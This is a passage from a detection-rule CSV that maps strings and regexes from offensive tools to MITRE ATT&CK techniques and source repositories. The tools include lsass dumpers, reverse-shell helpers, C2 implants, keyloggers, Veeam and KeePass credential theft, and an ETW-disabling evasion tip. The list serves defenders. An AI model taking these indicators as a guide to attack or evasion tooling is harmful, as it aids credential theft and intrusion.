APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","570","110","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" "*$calcwllx64 = ""TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4*",".{0,1000}\$calcwllx64\s\=\s\""TVqQAAMAAAAEAAAA\/\/8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\+AAAAA4.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","0","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z" "*$calcwllx86 = ""TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyAAAAA4*",".{0,1000}\$calcwllx86\s\=\s\""TVqQAAMAAAAEAAAA\/\/8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyAAAAA4.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","0","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z" "*$CertutilDump*",".{0,1000}\$CertutilDump.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*$DummyServiceName*",".{0,1000}\$DummyServiceName.{0,1000}","offensive_tool_keyword","crackmapexec","Variable name from script RestartKeePass.ps1 from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*$dumpDir\lsass.txt*",".{0,1000}\$dumpDir\\lsass\.txt.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "*$DumpLsass=*",".{0,1000}\$DumpLsass\=.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*$env:COMPlus_ETWEnabled=0*",".{0,1000}\$env\:COMPlus_ETWEnabled\=0.{0,1000}","offensive_tool_keyword","ETW","stop ETW from giving up your loaded .NET assemblies to that pesky EDR but can't be bothered patching memory? Just pass COMPlus_ETWEnabled=0 as an environment variable during your CreateProcess call","T1055.001 - T1059.001 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*$Env:TMP\Camera.ps1*",".{0,1000}\$Env\:TMP\\Camera\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*$Env:TMP\GetLogs.ps1*",".{0,1000}\$Env\:TMP\\GetLogs\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*$env:TMP\Leaked.txt*",".{0,1000}\$env\:TMP\\Leaked\.txt.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*$Env:TMP\Screenshot.ps1*",".{0,1000}\$Env\:TMP\\Screenshot\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*$Env:TMP\StartWebServer.ps1*",".{0,1000}\$Env\:TMP\\StartWebServer\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*$Env:TMP\Start-WebServer.ps1*",".{0,1000}\$Env\:TMP\\Start\-WebServer\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*$Env:TMP\tdfr.log*",".{0,1000}\$Env\:TMP\\tdfr\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*$Env:TMP\Upload.ps1*",".{0,1000}\$Env\:TMP\\Upload\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*$Env:TMP\webserver.ps1.ps1*",".{0,1000}\$Env\:TMP\\webserver\.ps1\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*$FilterArgs = @{ name='Notion'*EventNameSpace='root\\CimV2'*QueryLanguage=*WQL* Query=*SELECT * FROM __InstanceModificationE*",".{0,1000}\$FilterArgs\s\=\s\@\{\sname\=\'Notion\'.{0,1000}EventNameSpace\=\'root\\\\CimV2\'.{0,1000}QueryLanguage\=.{0,1000}WQL.{0,1000}\sQuery\=.{0,1000}SELECT\s.{0,1000}\sFROM\s__InstanceModificationE.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","0","N/A","10","10","1049","114","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" "*$ForensikeFolder*",".{0,1000}\$ForensikeFolder.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "*$FQDNDomainPlusAccountOperators*",".{0,1000}\$FQDNDomainPlusAccountOperators.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*$FQDNDomainPlusDomainAdmins*",".{0,1000}\$FQDNDomainPlusDomainAdmins.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*$FQDNDomainPlusEnterpriseAdmins*",".{0,1000}\$FQDNDomainPlusEnterpriseAdmins.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*$FQDNDomainPlusServerOperators*",".{0,1000}\$FQDNDomainPlusServerOperators.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*$Hc2$w$c$rQW$d$s$w$b$Hc2$v$xZp$f$w$V9z$rQW$L$U$xZp*",".{0,1000}\$Hc2\$w\$c\$rQW\$d\$s\$w\$b\$Hc2\$v\$xZp\$f\$w\$V9z\$rQW\$L\$U\$xZp.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*$HOME/.tunneler*",".{0,1000}\$HOME\/\.tunneler.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*$InsecureResourceDelegations*",".{0,1000}\$InsecureResourceDelegations.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*$InsecureTrusteeDelegations*",".{0,1000}\$InsecureTrusteeDelegations.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*$KeePassBinaryPath*",".{0,1000}\$KeePassBinaryPath.{0,1000}","offensive_tool_keyword","crackmapexec","Variable name from script RestartKeePass.ps1 from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*$KeePassUser*",".{0,1000}\$KeePassUser.{0,1000}","offensive_tool_keyword","crackmapexec","Variable name from script RestartKeePass.ps1 from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*$Keylogger=*",".{0,1000}\$Keylogger\=.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*$LolDriversVulnerable*",".{0,1000}\$LolDriversVulnerable.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*$MimiTickets*",".{0,1000}\$MimiTickets.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*$myC2ipAdress*",".{0,1000}\$myC2ipAdress.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "*$myVictimIPAdress*",".{0,1000}\$myVictimIPAdress.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","N/A","10","1","6","1","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z" "*$N0q$x$Hc2$rQW*",".{0,1000}\$N0q\$x\$Hc2\$rQW.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*$newClass[""__CLASS""] = ""PMEClass""*",".{0,1000}\$newClass\[\""__CLASS\""\]\s\=\s\""PMEClass\"".{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*$parametersConPtyShell*",".{0,1000}\$parametersConPtyShell.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","0","N/A","10","10","912","157","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" "*$SmbLoginSpray=*",".{0,1000}\$SmbLoginSpray\=.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*$ThisIsNotTheStringYouAreLookingFor*",".{0,1000}\$ThisIsNotTheStringYouAreLookingFor.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","N/A","Credential Access","https://github.com/projectb-temp/mimidogz","1","0","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z" "*$TotalNbCurrentPwdDiscovered*",".{0,1000}\$TotalNbCurrentPwdDiscovered.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","0","N/A","10","1","60","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z" "*$tunneler_dir/loclx.log*",".{0,1000}\$tunneler_dir\/loclx\.log.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*$VeaamRegPath*SqlDatabaseName*",".{0,1000}\$VeaamRegPath.{0,1000}SqlDatabaseName.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/sadshade/veeam-creds","1","0","N/A","10","1","71","24","2023-01-17T13:57:27Z","2021-02-05T03:13:08Z" "*$VeaamRegPath*SqlInstanceName*",".{0,1000}\$VeaamRegPath.{0,1000}SqlInstanceName.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/sadshade/veeam-creds","1","0","N/A","10","1","71","24","2023-01-17T13:57:27Z","2021-02-05T03:13:08Z" "*$VeaamRegPath*SqlServerName*",".{0,1000}\$VeaamRegPath.{0,1000}SqlServerName.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/sadshade/veeam-creds","1","0","N/A","10","1","71","24","2023-01-17T13:57:27Z","2021-02-05T03:13:08Z" "*%APPDATA%/Indexing.*",".{0,1000}\%APPDATA\%\/Indexing\..{0,1000}","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*%appdata%\(s)AINT*",".{0,1000}\%appdata\%\\\(s\)AINT.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*%APPDATA%\Windows:winrm.vbs*",".{0,1000}\%APPDATA\%\\Windows\:winrm\.vbs.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*%comspec% /k *.bat*",".{0,1000}\%comspec\%\s\/k\s.{0,1000}\.bat.{0,1000}","offensive_tool_keyword","cobaltstrike","C# .Net 5.0 project to build BOF (Beacon Object Files) in mass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ceramicskate0/BOF-Builder","1","0","N/A","10","10","24","3","2023-07-25T22:19:27Z","2021-09-07T01:28:11Z" "*%tmp%\void.zip*",".{0,1000}\%tmp\%\\void\.zip.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - 